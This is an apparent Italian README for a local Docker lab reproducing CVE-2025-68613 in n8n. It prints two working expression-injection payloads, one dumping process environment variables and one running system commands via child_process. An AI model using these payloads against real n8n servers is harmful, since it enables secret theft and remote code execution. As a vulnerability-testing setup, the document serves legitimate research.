
Analisi di CVE-2025-68613
Questo repository fornisce una semplice configurazione Docker Compose che esegue un'istanza n8n vulnerabile per test locali di CVE-2025-68613.
Avvia il container:
docker compose up -d
Apri n8n nel tuo browser:
Accedi con le credenziali predefinite impostate in docker-compose.yml:
adminpassworddocker compose down
Questo ambiente è destinato esclusivamente a test locali e isolati. Non esporre questa istanza a internet pubblico o a reti non attendibili. Mantienila su un segmento di rete privato ed esclusivamente locale, separato dai sistemi di produzione. Utilizzala a tuo rischio e pericolo.
Una volta avviato il container, puoi accedere all'interfaccia n8n all'indirizzo http://localhost:5678. Per testare la vulnerabilità, dovrai iniettare un payload JavaScript dannoso in un campo espressione.
Passaggi per la riproduzione:
Test 1: Esfiltrazione di variabili d'ambiente Questo payload tenta di accedere alle variabili d'ambiente del processo, che spesso contengono segreti.
{{ (function() { return this.process.env; })() }}

Test 2: Esecuzione remota di codice (RCE) Questo payload tenta di caricare il modulo child_process per eseguire comandi di sistema (es. whoami).
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

Risultato atteso: Se l'ambiente è vulnerabile, il pannello "Output" del nodo Set mostrerà il risultato del comando (es. root o l'utente n8n) o un oggetto JSON contenente le variabili d'ambiente. Se l'istanza fosse aggiornata con la patch (es. versione 1.122.0+), la sandbox restituirebbe un oggetto vuoto o un errore.